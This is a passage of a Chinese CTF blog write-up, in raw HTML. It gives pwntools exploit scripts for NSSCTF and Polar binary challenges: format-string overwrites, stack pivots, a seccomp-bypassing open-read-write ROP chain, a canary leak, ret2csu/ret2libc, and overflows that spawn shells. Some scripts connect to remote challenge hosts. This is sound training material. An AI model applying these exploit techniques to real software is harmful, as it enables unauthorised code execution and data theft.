src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"680\" height=\"250\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-13.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-667\"  sizes=\"auto, (max-width: 680px) 100vw, 680px\" \/><\/div><\/figure>\n\n\n\n<p>\u683c\u4e32\uff0c\u5229\u7528\u4efb\u610f\u5199\u7279\u6027\u6539key\u503c\u5c31\u597d\u4e86<\/p>\n\n\n\n<p>key\u5728bss\u4e0a\uff0c\u5730\u5740\u5c31\u662f\u5df2\u77e5\u7684\uff0c\u5229\u7528pwntools\u7684fmtstr_payload\u80fd\u641e\u51fa\u6765\u4e00\u4e2a\u521d\u6b65\u7684fmt\u5229\u7528\u7684pd<\/p>\n\n\n\n<p>fmt = 
fmtstr_payload(6,{key:0x66})<\/p>\n\n\n\n<p>\u8fd0\u884c\u4e00\u4e0b\u770b\u770b\u5b9e\u9645\u7684\u8f93\u5165\uff1ab&#8217;%102c%8$llnaaaab\\xa0\\x10`\\x00\\x00\\x00\\x00\\x00&#8242;<\/p>\n\n\n\n<p>\u5bf9\u4f4d\u6539\u6539\uff0c\u5c31\u80fd\u6253\u51fa\u4e2arbp\u5730\u5740\u51fa\u6765<\/p>\n\n\n\n<p>pd = b&#8217;%102c%8$lln%28$p&#8217; + p64(key)<\/p>\n\n\n\n<p>\u5b9e\u9645\u8f93\u5165\u4e5f\u5c31\u662f\uff1a<\/p>\n\n\n\n<p>b&#8217;%102c%8$lln%28$p\\xa0\\x10`\\x00\\x00\\x00\\x00\\x00&#8242;<\/p>\n\n\n\n<p>\uff08\u8fd8\u662f\u5f88\u597d\u4e00\u773c\u76ef\u771f\u7684\u2026\u2026\u5427\uff09<\/p>\n\n\n\n<p>\u4f60\u95ee\u6211\u4e3a\u4ec0\u4e48\u662f28\uff1f<\/p>\n\n\n\n<p>\u683c\u4e32\u81ea\u5df1\u6d4b\u53bb\u5427\uff08\uff09<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-14-1024x469.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"469\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-14-1024x469.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-668\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" 
\/><\/div><\/figure>\n\n\n\n<p>\uff08\u56fe\u91cc\u8f93\u5165\u768430\u4e2a%p\uff0c\u8fd9\u91cc\u5bf9\u4f4d\u770b\u5230\u7684rbp\u5c31\u662f\u7b2c28\u4f4d\uff09<\/p>\n\n\n\n<p>\u597d\u4e86\uff0csend\u4e4b\u540e\u5b8c\u6210rbp\u5730\u5740\u7684\u63a5\u6536\uff0c\u8fdb\u5165\u4e24\u6b21read\u7684\u73af\u8282<\/p>\n\n\n\n<p>\u597d\uff0c\u7b2c\u4e00\u6b21read\u5199\u5165\u7684\u5730\u5740\u662fbuf<\/p>\n\n\n\n<p>\u8fd8\u662fgdb\u6d4b\uff0c\u8fd9\u4e2a\u611f\u89c9\u6ca1\u5fc5\u8981\u591a\u8bf4\u4e86\uff0c\u770b\u770bexp\u91cc\u7684\u6d4b\u8bd5\u6ce8\u91ca\u5e94\u8be5\u5c31\u80fd\u7406\u89e3\u4e2a\u4e03\u4e03\u516b\u516b<\/p>\n\n\n\n<p>\u7136\u540e\uff0c\u7136\u540e\u611f\u89c9\u5c31\u6ca1\u591a\u5c11\u597d\u8bb2\u7684\u4e86<\/p>\n\n\n\n<p>\u7b2c\u4e8c\u6b21\u5199\u5165\u7684\u4f4d\u7f6e\u662fhdctf<\/p>\n\n\n\n<p>\u4e5f\u5728bss\u6bb5<\/p>\n\n\n\n<p>\u90a3rop\u94fe\u8def\u5c31\u5f02\u5e38\u660e\u6670\u4e86<\/p>\n\n\n\n<p>ret + rdi + \/bin\/sh\u7684\u76ee\u6807\u5199\u5165\u5730\u5740 + syscall<\/p>\n\n\n\n<p>\u7136\u540e\u8fd9\u4e2aljust\u586b\u5145\u4e00\u4e0b\uff0c\u4f7f\u5176\u5b8c\u6210\u6ea2\u51fa<\/p>\n\n\n\n<p>\u518d\u63a5\u4e2arbp\u548cleave\u5c31\u80fd\u5b9e\u73b0\u6211\u4eec\u7684\u76ee\u6807\u8df3\u8f6c<\/p>\n\n\n\n<p>\u53cd\u6b63\u662f\u7b2c\u4e8c\u6b21\u4f20\u5165\u7684\u65f6\u5019\u5199\u5165\/bin\/sh\u5230hdctf\u90a3\u53bb<\/p>\n\n\n\n<p>\u5199\u5b8c\u5c31getshell<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>context(os='linux', arch='amd64', log_level='debug')<br>io = process(\".\/pwn\")<br># io = remote(\"node5.anna.nssctf.cn\",21184)<br>elf = ELF(\".\/pwn\")<br>\u200b<br>ret = 0x0000000000400581<br>pop_rdi = 0x0000000000400893<br>leave = 0x0000000000400758<br>key = 0x6010A0<br>syscall = 0x000000000400763<br>\u200b<br># \u8fdb\u4e24\u8bfb\u9636\u6bb5<br>io.recvuntil(b'you name?\\n\\n')<br>fmt = fmtstr_payload(6,{key:0x66})<br>pd = b'%102c%8$lln%28$p' + p64(key)<br>print(fmt) &nbsp; 
&nbsp;#b'%102c%8$llnaaaab\\xa0\\x10`\\x00\\x00\\x00\\x00\\x00'<br>print(pd) &nbsp; &nbsp; #b'%102c%8$lln%28$p\\xa0\\x10`\\x00\\x00\\x00\\x00\\x00'<br># gdb<br>#gdb.attach(io)<br>io.send(pd)<br>\u200b<br>#\u63a5\u6536rbp\u5730\u5740<br>io.recvuntil(b'0x')<br>rbp = int(io.recv()&#91;0:12],16)<br>rbp_a = hex(rbp)<br>success(rbp_a)<br>\u200b<br>#\u627etarget_addr<br># io.send(b'aaaa')<br>#  &#91;+] 0x7fff85963780<br># pwndbg&gt; search aaaa<br># Searching for byte: b'aaaa'<br># libc.so.6 &nbsp; &nbsp; &nbsp; 0x7f303df89943 0x61616161 \/* 'aaaa' *\/<br># &#91;stack] &nbsp; &nbsp; &nbsp; &nbsp; 0x7fff85963790 0x61616161 \/* 'aaaa' *\/<br># 0x7fff85963790 - 0x7fff85963780 = 0x10<br>target = rbp + 0x10<br>h_tar = hex(target)<br>success(h_tar)<br>offset = 0x30<br>hdctf = 0x0000000006010C0<br>\u200b<br>rop = p64(ret) + p64(pop_rdi) + p64(hdctf) + p64(syscall) <br>pd2 = rop.ljust(offset, b'\\x00')<br>pd2 += p64(target)<br>pd2 += p64(leave)<br>\u200b<br>#gdb.attach(io)<br>io.send(pd2)<br>io.recvuntil(b\"That's great.Do you like Minions?\\n\")<br>io.send(b'\/bin\/sh\\x00')<br>\u200b<br>io.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">[HGAME 2023 week1]orw<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>\u250c\u2500\u2500(kali\u327fkali)-&#91;~\/\u684c\u9762\/NSS\/&#91;HGAME 2023 week1]orw]<br>\u2514\u2500$ seccomp-tools dump .\/vuln <br> line  CODE  JT &nbsp; JF &nbsp; &nbsp;  K<br>=================================<br> 0000: 0x20 0x00 0x00 0x00000000  A = sys_number<br> 0001: 0x15 0x02 0x00 0x0000003b &nbsp;if (A == execve) goto 0004<br> 0002: 0x15 0x01 0x00 0x00000142 &nbsp;if (A == execveat) goto 0004<br> 0003: 0x06 0x00 0x00 0x7fff0000  return ALLOW<br> 0004: 0x06 0x00 0x00 0x00000000  return 
KILL<\/code><\/pre>\n\n\n\n<p>\u5927\u6982\u4e5f\u731c\u5230\u600e\u4e48\u6253\u4e86<\/p>\n\n\n\n<p>orw\u6784\u9020rop\u94fe\uff0c\u770b\u5230\u6807\u7b7e\u662f\u6808\u8fc1\u79fb<\/p>\n\n\n\n<p>\u5927\u6982\u7387\u5e94\u8be5\u6709\u4e2a\u6570\u4e86<\/p>\n\n\n\n<p>vuln\u91cc\u7684read\u5199\u4e0d\u4e0b<\/p>\n\n\n\n<p>\u6240\u4ee5\u6253\u4e2a\u6808\u8fc1\u79fb<\/p>\n\n\n\n<p>\u5c31\u8fd9\u4e48\u4e2a\u4e8b<\/p>\n\n\n\n<p>rop\u94fe\u5f80\u53ef\u4ee5\u653e\u7684\u5730\u65b9\u5199\uff0c\u5199\u4e2aorw\u94fe\u5b50<\/p>\n\n\n\n<p>\u7136\u540e\uff0c\u63a7\u5236\u7a0b\u5e8f\u6d41\u8fc1\u79fb\u5230rop\u94fe\u4f4d\u7f6e<\/p>\n\n\n\n<p>\u7ed3\u675f<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>payload &nbsp;= b'\/flag\\00\\x00\\x00'<br>payload += p64(pop_rdi) + p64(bss)<br>payload += p64(pop_rsi) + p64(0)<br>payload += p64(open_addr)<br>\u200b<br>payload += p64(pop_rdi) + p64(3)<br>payload += p64(pop_rsi) + p64(bss)<br>payload += p64(pop_rdx) + p64(0x100)<br>payload += p64(read_addr)<br>\u200b<br>payload += p64(pop_rdi) + p64(1)<br>payload += p64(pop_rsi) + p64(bss)<br>payload += p64(pop_rdx) + p64(0x100)<br>payload += p64(write_addr)<br>\u200b<br>payload &nbsp;= payload.ljust(0x100, b'\\x00')<br>payload += p64(bss) + p64(leave)<br>io.send(payload)<\/code><\/pre>\n\n\n\n<p> <strong>1. 
open(&#8220;\/flag&#8221;, 0)<\/strong><\/p>\n\n\n\n<p>\u8981\u8bbe\u7f6e\u7684\u5bc4\u5b58\u5668\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><thead><tr><th>\u5bc4\u5b58\u5668<\/th><th>\u503c<\/th><th>\u89e3\u91ca<\/th><\/tr><\/thead><tbody><tr><td><strong>rdi<\/strong><\/td><td>\u6587\u4ef6\u540d\u5730\u5740<\/td><td>open \u7684\u7b2c 1 \u4e2a\u53c2\u6570<\/td><\/tr><tr><td><strong>rsi<\/strong><\/td><td>0<\/td><td>open \u7684 flags \u53c2\u6570\uff08\u53ea\u8bfb\uff09<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<pre class=\"wp-block-preformatted\">b\"\/flag\\x00\\x00\\x00\" &nbsp; &nbsp; # filename \u5b57\u7b26\u4e32（同时也是 leave 里 pop rbp 吃掉的那 8 字节，所以必须放在链的最前面）<br>pop_rdi; bss &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;# rdi = &amp;\"\/flag\"<br>pop_rsi; 0 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;# rsi = 0 (O_RDONLY)<br>open_addr &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # \u8c03\u7528 open()<\/pre>\n\n\n\n<p><strong>\u6548\u679c\uff1a<\/strong> <code>open(\"\/flag\", 0)<\/code> \u7cfb\u7edf\u5c06\u8fd4\u56de fd=3\uff08\u524d 0,1,2 \u5df2\u5360\u7528\uff09\u3002这里假定程序之前没有打开过别的文件；不确定的话先本地用 strace 跑一遍确认实际返回的 fd，再定后面 read 的第一个参数。<\/p>\n\n\n\n<p><strong>2. 
read(3, bss, 0x100)<\/strong><\/p>\n\n\n\n<p>\u8981\u8bbe\u7f6e\u7684\u5bc4\u5b58\u5668\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><thead><tr><th>\u5bc4\u5b58\u5668<\/th><th>\u503c<\/th><th>\u89e3\u91ca<\/th><\/tr><\/thead><tbody><tr><td><strong>rdi<\/strong><\/td><td>3<\/td><td>open \u8fd4\u56de\u7684\u6587\u4ef6\u63cf\u8ff0\u7b26<\/td><\/tr><tr><td><strong>rsi<\/strong><\/td><td>bss<\/td><td>\u5b58 flag \u7684\u7f13\u51b2\u533a<\/td><\/tr><tr><td><strong>rdx<\/strong><\/td><td>0x100<\/td><td>read \u8bfb\u53d6\u7684\u957f\u5ea6<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<pre class=\"wp-block-preformatted\">pop_rdi; 3 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # rdi = 3 &nbsp; (fd)<br>pop_rsi; bss &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # rsi = buffer<br>pop_rdx; 0x100 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # rdx = length<br>read_addr &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;# \u8c03\u7528 read()<\/pre>\n\n\n\n<p><strong>\u6548\u679c\uff1a<\/strong> <code>read(3, bss, 0x100)<\/code> \u5c06 flag \u5185\u5bb9\u8bfb\u5230 bss \u6bb5\u3002注意 bss 同时也是这条 ROP 链自己所在的位置：read 从 bss 开头往后写，而此时 rsp 已经走到 read_addr 之后的 bss+0x68（8 字节的 \/flag 加上前面 12 个 8 字节的 gadget 和参数），所以只要 flag 长度不超过 0x68 字节，后面 write 那一段链就不会被覆盖；flag 更长的话要把 read\/write 用的缓冲区改到链之后的地址。<\/p>\n\n\n\n<p> <strong>3. 
write(1, bss, 0x100)<\/strong><\/p>\n\n\n\n<p>\u8981\u8bbe\u7f6e\u7684\u5bc4\u5b58\u5668\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><thead><tr><th>\u5bc4\u5b58\u5668<\/th><th>\u503c<\/th><th>\u89e3\u91ca<\/th><\/tr><\/thead><tbody><tr><td><strong>rdi<\/strong><\/td><td>1<\/td><td>\u6807\u51c6\u8f93\u51fa<\/td><\/tr><tr><td><strong>rsi<\/strong><\/td><td>bss<\/td><td>flag \u7684\u5185\u5bb9<\/td><\/tr><tr><td><strong>rdx<\/strong><\/td><td>0x100<\/td><td>\u8f93\u51fa\u957f\u5ea6<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<pre class=\"wp-block-preformatted\">pop_rdi; 1 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # rdi = stdout<br>pop_rsi; bss &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # rsi = flag buffer<br>pop_rdx; 0x100 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # rdx = length<br>write_addr &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # \u8c03\u7528 write()<\/pre>\n\n\n\n<p><strong>\u6548\u679c\uff1a<\/strong> <code>write(1, bss, 0x100)<\/code> \u5c06 flag \u8f93\u51fa\u5230\u7ec8\u7aef\u3002<\/p>\n\n\n\n<p> <strong>4. 
leave;ret\uff08\u6808\u8fc1\u79fb\uff09<\/strong><\/p>\n\n\n\n<p>\u4e4b\u540e padding \u5230 0x100\uff0c\u7136\u540e\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">payload += p64(bss) + p64(leave)<\/pre>\n\n\n\n<p>\u542b\u4e49\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><thead><tr><th>\u5bc4\u5b58\u5668\/\u64cd\u4f5c<\/th><th>\u89e3\u91ca<\/th><\/tr><\/thead><tbody><tr><td>rsp = bss<\/td><td>\u8ba9\u6808\u6307\u5411 ROP \u94fe\u6240\u5728\u4f4d\u7f6e<\/td><\/tr><tr><td>leave = mov rsp, rbp; pop rbp<\/td><td>\u6062\u590d\u6808\u5e27\uff0c\u7ee7\u7eed\u6267\u884c ROP<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p>\u6784\u9020\u7684\u5bc4\u5b58\u5668\u503c\u5bf9\u5e94\u6548\u679c\u5982\u4e0b\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><thead><tr><th>\u51fd\u6570<\/th><th>rdi<\/th><th>rsi<\/th><th>rdx<\/th><th>\u4f5c\u7528<\/th><\/tr><\/thead><tbody><tr><td>open<\/td><td>\u6587\u4ef6\u540d\u5730\u5740<\/td><td>0<\/td><td>\u2014<\/td><td>\u6253\u5f00\u6587\u4ef6<\/td><\/tr><tr><td>read<\/td><td>3<\/td><td>bss<\/td><td>0x100<\/td><td>\u8bfb\u53d6 flag<\/td><\/tr><tr><td>write<\/td><td>1<\/td><td>bss<\/td><td>0x100<\/td><td>\u8f93\u51fa flag<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p>exp:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>#context.log_level = 'debug'<br>io = process(\".\/vuln\")<br># io = remote(\"node5.anna.nssctf.cn\",24095)<br>elf = ELF(\".\/vuln\")<br>libc = ELF(\".\/libc-2.31.so\")<br>\u200b<br>system = libc.symbols&#91;\"system\"]<br>ret = 0x000000000040101a<br>pop_rdi = 0x0000000000401393<br>leave = 0x00000000004012be<br>main = 0x0000000004012F0<br># \u6cc4\u6f0flibc\u57fa\u5740<br>puts_got = elf.got&#91;'puts']<br>puts_plt = elf.plt&#91;'puts']<br>\u200b<br>pd1 = b'a'*(0x108) + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main)<br>#gdb<br>#gdb.attach(io)<br>io.sendline(pd1)<br>io.recvuntil(b'Maybe you can learn something about 
seccomp, before you try to solve this task.\\n')<br>leak = io.recv()&#91;0:6]<br>leak = leak.ljust(8,b'\\x00')<br>leak = u64(leak)<br>h_leak = hex(leak)<br>success(f'puts addr = {h_leak}')<br>libc_base = leak - libc.symbols&#91;'puts']<br>h_base = hex(libc_base)<br>success(f'libc base = {h_base}')<br># &#91;+] puts addr = 0x70ef67573420<br># &#91;+] libc base = 0x70ef674ef000<br># 0x70ef674ef000 &nbsp; &nbsp; 0x70ef67511000 r--p &nbsp;  22000 &nbsp; &nbsp; &nbsp; 0 libc-2.31.so<br># \u6d4b\u8bd5\u7ed3\u679c\u4e00\u81f4<br># \u5e03\u7f6eorw<br>bss = 0x000000000404300<br>open_addr = libc_base + libc.symbols&#91;'open']<br>read_addr = libc_base + libc.symbols&#91;'read']<br>write_addr = libc_base + libc.symbols&#91;'write']<br>pop_rdx = libc_base + 0x0000000000142c92<br>pop_rsi = libc_base + 0x000000000002601f<br>\u200b<br>gdb.attach(io)<br>over = b'a'*(0x100) + p64(bss+0x100) + p64(0x4012CF) <br>io.sendline(over)<br>pause()<br>\u200b<br>payload = b'\/flag\\00\\x00\\x00' + p64(pop_rdi) + p64(bss) + p64(pop_rsi) + p64(0) + p64(open_addr)<br>payload += p64(pop_rdi) + p64(3) + p64(pop_rsi) + p64(bss) + p64(pop_rdx) + p64(0x100) + p64(read_addr)<br>payload += p64(pop_rdi) + p64(1) +p64(pop_rsi) + p64(bss) + p64(pop_rdx) + p64(0x100) + p64(write_addr)<br>payload = payload.ljust(0x100, b'\\x00')<br>payload += p64(bss) + p64(leave) <br>io.send(payload)<br>\u200b<br>io.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">[HGAME 2022 week1]test your gdb<\/h2>\n\n\n\n<p><a href=\"https:\/\/oslike.github.io\/2023\/03\/10\/HGAME2022week1-test-your-gdb-wp\/\">HGAME2022week1-test your gdb &#8211; OSLike&#8217;s Blog<\/a><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>\u200b<br>#io = process('.\/pwn')<br>io = remote(\"node5.anna.nssctf.cn\",22319)<br>\u200b<br># gdb.attach(io, 'b *0x401378')<br>\u200b<br># pause()<br>\u200b<br>backdoor = 0x401256<br>payload = p64(0xb0361e0e8294f147) + 
p64(0x8c09e0c34ed8a6a9)<br>io.recvuntil(b'word\\n')<br>io.send(payload)<br>io.recv(0x18)<br>canary = u64(io.recv(8))<br>log.success(\"canary: \" + (hex(canary)))<br>\u200b<br>payload = b'a' * (0x20 - 0x08) + p64(canary) + p64(0) + p64(backdoor)<br>io.sendline(payload)<br>io.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">[MoeCTF 2022]babyfmt<\/h2>\n\n\n\n<p>\u76f8\u5f53\u5e38\u89c4\u7684\u683c\u4e32\u52ab\u6301got\u8868\u5230\u540e\u95e8\u51fd\u6570<\/p>\n\n\n\n<p>\u552f\u4e00\u62bd\u8c61\u7684\u70b9\u5728\u4e8e\u5229\u7528\u5b83\u8f93\u51fa\u7684gift\u5730\u5740\u6253\u4e0d\u901a<\/p>\n\n\n\n<p>\u4e0d\u7406\u89e3\u4e3a\u4ec0\u4e48\u5b83gdb\u8c03\u8bd5\u8fd0\u884c\u51fa\u6765\u7684\u540e\u95e8\u51fd\u6570\u5730\u5740\u90fd\u662f\u5bf9\u7684<\/p>\n\n\n\n<p>\u4f46\u662f\u811a\u672c\u8fd0\u884c\u6536\u5230\u7684\u5c31\u662f\u4e0d\u5bf9<\/p>\n\n\n\n<p>\u5947\u4e86\u602a\u4e86<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">from pwn import *<br>context.log_level = 'debug'<br>io = process(\".\/pwn\")<br>elf = ELF(\".\/pwn\")<br># io = remote(\"node5.anna.nssctf.cn\",21351)<br>\u200b<br>#io.recvuntil(b'gift:')<br>#backdoor = io.recv()[1:10]<br>backdoor = elf.symbols[\"backdoor\"]<br>success(f\"backdoor = :{backdoor}\")<br>\u200b<br>printf_got = elf.got[\"printf\"]<br>pd = fmtstr_payload(11,{printf_got:backdoor})<br>io.send(pd)<br>\u200b<br>\u200b<br>io.interactive()<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">[HNCTF 2022 WEEK2]ret2csu<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>context.log_level = 'debug'<br>context.arch = 'amd64'<br>context.os = 'linux'<br>io = process(\".\/ret2csu\")<br>elf = ELF(\".\/ret2csu\")<br># libc = ELF(\".\/libc.so.6\")<br>libc = ELF(\"\/lib\/x86_64-linux-gnu\/libc.so.6\")#\u8fd9\u91cc\u662f\u4e3a\u4e86\u6d4b\u672c\u5730\uff0c\u4e0d\u5fc5\u5728\u610f\u8fd9\u4e2alibc\u6587\u4ef6<br># io = remote(\"node5.anna.nssctf.cn\",27035) <br>\u200b<br>ret = 0x000000000040101a<br>pop_rdi = 
0x00000000004012b3<br>csu_addr = 0x0000000004012A6<br>mov_csu = 0x000000000401290<br>return_addr = 0x4011DC &nbsp;#\u8df3\u8f6c\u56demain\u51fd\u6570\u4e3a\u6253ret2libc\u505a\u51c6\u5907<br>write_got = elf.got&#91;'write']<br>\u200b<br>def csu(rsi,r15):<br>    # write(fd,buf,n) = write(rdi,rsi,rdx)<br>    pd = b'a'*(0x100 + 8)<br>    pd += p64(csu_addr) + p64(3) #\u968f\u4fbf\u8ddf\u4e00\u4e2a\u5c31\u597d<br>    pd += p64(0) #pop &nbsp; &nbsp; rbx ,rbx\u8981\u8bbe\u7f6e\u62100 \u56e0\u4e3a\u6709\u4e2acall r15+rbx*8\u7684\u6c47\u7f16<br>    pd += p64(1)<br>    pd += p64(1) #pop rdi<br>    pd += p64(rsi) # pop rsi<br>    pd += p64(8) # \u8bbe\u7f6e\u4e3a8\u662f\u56e0\u4e3awrite\u8981\u51998\u5b57\u8282\u7684\u5730\u5740\u51fa\u6765<br>    pd += p64(r15)<br>    pd += p64(mov_csu)<br>    pd += b'a'*56 + p64(0x4011DC) #\u52a056\u4e2a\u5b57\u7b26\u662f\u7528\u6765\u8df3\u8fc7csu\u76846\u4e2apop\u548c\u6700\u5f00\u59cb\u7684 add rsp 8\uff0c\uff086+1\uff09 * 8 = 56<br>    # &nbsp;  csu(1, &nbsp; write_got, 8, &nbsp; write_got, main_addr)<br>    #def csu(r12, r13, &nbsp; &nbsp; &nbsp; r14, r15, &nbsp; &nbsp; &nbsp; last):<br>    #def csu(rdi, rsi, &nbsp; &nbsp; &nbsp; rdx, r15, &nbsp; &nbsp; &nbsp; last)<br>    gdb.attach(io)<br>    io.sendline(pd)<br>    <br>    <br>csu(write_got,write_got)<br>io.recvuntil(b'Ok.\\n')<br>write = u64(io.recv(6).ljust(8,b'\\x00'))<br>print(hex(write))<br>libc_base = write - libc.symbols&#91;'write']<br>print(hex(libc_base))<br>system_add = libc_base + libc.symbols&#91;'system']<br>bin_sh_add = libc_base + next(libc.search(b'\/bin\/sh'))<br>payload=b'a'*264+p64(pop_rdi)+p64(bin_sh_add)+p64(system_add)<br>io.recvuntil(\"Input:\\n\")<br>\u200b<br>io.sendline(payload)<br>io.interactive()<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-preformatted\"><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">[CISCN 
2019\u534e\u5357]PWN4<\/h2>\n\n\n\n<p>\u88abNSS\u9a97\u91d1\u5e01\u4e86<\/p>\n\n\n\n<p>\u597d\u5427\u5e76\u4e0d\u662f<\/p>\n\n\n\n<p>\u6b64\u9898\u53c2\u8003\u9694\u58c119\u5e74\u4e1c\u5357\u8d5b\u533a\u7684pwn2<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>context.log_level = 'debug'<br>context.arch = 'i386'<br>#io = process(\".\/pwn\")<br>io = remote('node5.anna.nssctf.cn',22934)<br>elf = ELF(\".\/pwn\")<br>\u200b<br>leave = 0x08048562<br>ret = 0x080483a6<br>system &nbsp;= 0x8048559<br>\u200b<br>\u200b<br>pd = b'a'*(0x28)<br>\u200b<br>\u200b<br>io.send(pd)<br>io.recvuntil(b'a'*(0x28))<br>\u200b<br>leak_ebp = u32(io.recv(4))<br>p = hex(leak_ebp)<br>log.success(f'leak ebp = {p}')<br>\u200b<br>padding = 0x10<br>s = 0x28<br>target = leak_ebp - s - padding<br>h_target = hex(target)<br>log.success(f'target = {h_target}')<br>\u200b<br>pd2 = p32(0)<br>pd2 += p32(ret)<br>pd2 += p32(system)<br>pd2 += p32(target + 0x4*4)<br>pd2 += b'\/bin\/sh\\x00'<br>pd2 = pd2.ljust(0x28,b'a')<br>pd2 += p32(target)<br>pd2 += p32(leave)<br>\u200b<br># gdb.attach(io)<br>io.send(pd2)<br>io.interactive()<\/code><\/pre>\n\n\n\n<p>\u80fd\u5f88\u5feb\u7684\u5224\u65ad\u51fa\u6765\u662f\u505a\u8fc7\u7684\u9898\u76ee\uff0c\u8fd9\u5f88\u597d<\/p>\n\n\n\n<p>\u4f46\u662f\u6253\u7684\u65f6\u5019\u603b\u662f\u5fd8\u8fd9\u5fd8\u90a3<\/p>\n\n\n\n<p>\u8fd8\u662f\u719f\u7ec3\u5ea6\u95ee\u9898<\/p>\n\n\n\n<p>\u8fd8\u662f\u5f97\u7ec3<\/p>\n\n\n\n<p>\u6068<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">Polar<\/h1>\n\n\n\n<h2 class=\"wp-block-heading\">sandbox<\/h2>\n\n\n\n<p><code>$0<\/code>\u63d0\u6743<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">creeper<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>io = remote(\"1.95.36.136\",2095)<br>\u200b<br>pd = b'a'*(0xf)<br>io.send(pd)<br>io.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">\u7b80\u5355\u6ea2\u51fa<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>io = 
remote(\"1.95.36.136\",2080)<br>\u200b<br>offset = 0x30 + 8<br>sh = 0x000000000400596<br>ret = 0x0000000000400441<br>pd = b'a'*offset<br>pd += p64(ret)<br>pd += p64(sh)<br>\u200b<br>io.sendline(pd)<br>\u200b<br>io.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">\u6ca1\u4eba\u80fd\u62d2\u7edd\u732b\u732b<\/h2>\n\n\n\n<p>\u6ea2\u51fa\u8986\u76d6\u5185\u5bb9\uff0c\u83b7\u53d6shell<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>context.log_level = 'debug'<br>io = remote(\"1.95.36.136\",2148)<br># io = process(\".\/pwn\")<br>pd = b'a'*(32) +b'lovecat' + p64(0) <br># gdb.attach(io)<br>io.sendline(pd)<br>io.interactive()<\/code><\/pre>\n\n\n\n<h2 